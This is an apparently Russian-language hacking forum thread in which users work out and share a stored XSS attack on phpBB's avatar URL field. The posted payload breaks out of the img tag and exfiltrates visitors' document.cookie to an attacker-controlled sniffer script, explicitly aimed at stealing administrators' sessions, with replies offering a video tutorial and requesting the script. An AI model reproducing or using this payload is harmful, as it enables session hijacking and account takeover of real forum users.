![]() |
XSS в phpBB
йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая :confused:
Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert(); в ответ получил: <img src="javascript:alert();" alt="" border="0" /> идем дальше... решил проверить на окончание *.jpg , вписав x.jpg и получил: <img src="x.jpg" alt="" border="0" /> затем проверил вписав x.ru x=`x.jpg получил: <img src="x.ru x=`x.jpg" alt="" border="0" /> и т.п. Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается :mad: Помогите плзз... :( |
Приведи код, который ты вставляешь в форум.
|
поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla получится <img src="bla-bla-bla" alt="" border="0" /> пишем javascript:alert(document.cookie) и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" /> Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст"> Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки... Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?! ;) |
Ура-а-а-а-а-а!!!!!! Решение найдено!! :cool: ;) :p
|
Короче так... :cool:
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается ;) Инфы об этом XSS ни где не встречал, поэтому можно считать новой :rolleyes: XSS такой: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie) где [target] - url на реальную картинку localhost - url снифера В ответ от сервера получаем в html-тегах: <img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" /> таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу :rolleyes: з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex. С ув., Йа )) |
Мля мля неработает ...
Цитата:
|
Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?
P.s.: я могу написать видео... |
Обломчик,на большенстве серверов стоит блок 8)
|
Цитата:
Цитата:
Цитата:
|
Парни помогите или дайте ссылку на мануал ..... нужно ... или оправте скрипт и ссылку на мыло alien51@yandex.ru заранее спасибо.
|
| Время: 11:35 |